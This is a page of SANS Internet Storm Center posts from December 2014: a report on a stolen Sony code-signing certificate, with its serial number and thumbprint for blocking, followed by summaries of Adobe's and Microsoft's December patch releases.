Update: Turns out that the malware sample that Kaspersky was reporting on was not actual malware from a real incident. But the story isn't quite harmless, and the certificate should still be considered compromised. A researcher found the certificate as part of the SONY data that was widely distributed by the attackers. The filename of the certificate was also the password for the private key. The researcher then created a signed copy of an existing malware sample retrieved from Malwr and uploaded it to VirusTotal to alert security companies. Kaspersky analyzed the sample and published the results, not realizing that this was not an in-the-wild sample. [1] The certificate has been added to the respective CRLs.

--- original story ---

We haven't really mentioned the ongoing SONY compromise here, in part because there is very little solid information public (and we don't want to just speculate), and also because, without a good idea about what happened, it is difficult to talk about lessons learned.

However, one facet of the attack may have wider implications. Securelist is reporting that they spotted malware that is signed with a valid SONY certificate. It is very likely that the private key used to create the signature was part of the loot from the recent compromise. Malware signed by a major corporation is much more likely to be installed by users. It also emphasizes again the depth at which SONY was (or is) compromised. [2]

An effort is underway to revoke the certificate. But certificate revocation lists are notoriously unreliable and slow to update, so it may take a while for the revocation to propagate. Signatures that were timestamped before the certificate's revocation date will also continue to validate, so a local block on the serial number and thumbprint below is the more dependable control.

Stolen certificate serial number: 01 e2 b4 f7 59 81 1c 64 37 9f ca 0b e7 6d 2d ce
Thumbprint: 8d f4 6b 5f da c2 eb 3b 47 57 f9 98 66 c1 99 ff 2b 13 42 7a

[1] http://securelist.com/blog/security-policies/68073/destover-malware-now-digitally-signed-by-sony-certificates/
[2] https://twitter.com/afreak/status/542539515500298240

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, December 10th 2014 http://isc.sans.edu/podcastdetail.html?id=4269, (Wed, Dec 10th)

Tue, 12/09/2014 - 19:09
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Adobe December Patch Tuesday, (Wed, Dec 10th)

Tue, 12/09/2014 - 17:24

Adobe today released two new bulletins and updated the Reader/Acrobat bulletin that was published a week ago.

  • The first new bulletin fixes 6 vulnerabilities, some of which can lead to remote code execution. Adobe rates this patch with a priority of 1.
  • The Reader/Acrobat update fixes 20 different vulnerabilities. The bulletin has a priority rating of 1.
  • The ColdFusion bulletin applies to ColdFusion 10 and 11 and fixes a denial of service vulnerability (CVE-2014-9166). The vulnerability has not been used in any exploits so far.

http://helpx.adobe.com/security.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Microsoft Patch Tuesday - December 2014, (Tue, Dec 9th)

Tue, 12/09/2014 - 11:25

Overview of the December 2014 Microsoft patches and their status.

MS14-075  Vulnerabilities in Microsoft Exchange Server Could Allow Elevation of Privilege (Replaces MS13-105)
          Affected: Microsoft Exchange
          CVE-2014-6319, CVE-2014-6325, CVE-2014-6326, CVE-2014-6336
          KB 3009712   Known exploits: none   Microsoft rating: Important
          ISC rating: clients N/A, servers Important

MS14-080  Cumulative Security Update for Internet Explorer (Replaces MS14-065)
          Affected: Microsoft Windows, Internet Explorer
          CVE-2014-6327, CVE-2014-6328, CVE-2014-6329, CVE-2014-6330, CVE-2014-6363, CVE-2014-6365, CVE-2014-6366, CVE-2014-6368, CVE-2014-6369, CVE-2014-6373, CVE-2014-6374, CVE-2014-6375, CVE-2014-6376, CVE-2014-8966
          KB 3008923   Known exploits: none   Microsoft rating: Critical
          ISC rating: clients Critical, servers Critical

MS14-081  Vulnerabilities in Microsoft Word and Microsoft Office Web Apps Could Allow Remote Code Execution (Replaces MS14-017, MS14-061, MS14-069)
          Affected: Microsoft Office
          CVE-2014-6356, CVE-2014-6357
          KB 3017301   Known exploits: none   Microsoft rating: Critical
          ISC rating: clients Critical, servers Important

MS14-082  Vulnerability in Microsoft Office Could Allow Remote Code Execution (Replaces MS09-060)
          Affected: Microsoft Office
          CVE-2014-6364
          KB 3017349   Known exploits: none   Microsoft rating: Important
          ISC rating: clients Critical, servers Important

MS14-083  Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (Replaces MS13-085)
          Affected: Microsoft Office
          CVE-2014-6360, CVE-2014-6361
          KB 3017347   Known exploits: none   Microsoft rating: Important
          ISC rating: clients Critical, servers Important

MS14-084  Vulnerability in VBScript Scripting Engine Could Allow Remote Code Execution (Replaces MS14-011)
          Affected: Microsoft Windows
          CVE-2014-6363
          KB 3016711   Known exploits: none   Microsoft rating: Critical
          ISC rating: clients Critical, servers Critical

MS14-085  Vulnerability in Microsoft Graphics Component Could Allow Information Disclosure
          Affected: Microsoft Windows
          CVE-2014-6355
          KB 3013126   Known exploits: vulnerability publicly known   Microsoft rating: Important
          ISC rating: clients Important, servers Important

We will update issues on this page for about a week or so as they evolve. We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY.

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.

--
Alex Stanford - GIAC GWEB GSEC
Research Operations Manager,
SANS Internet Storm Center

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts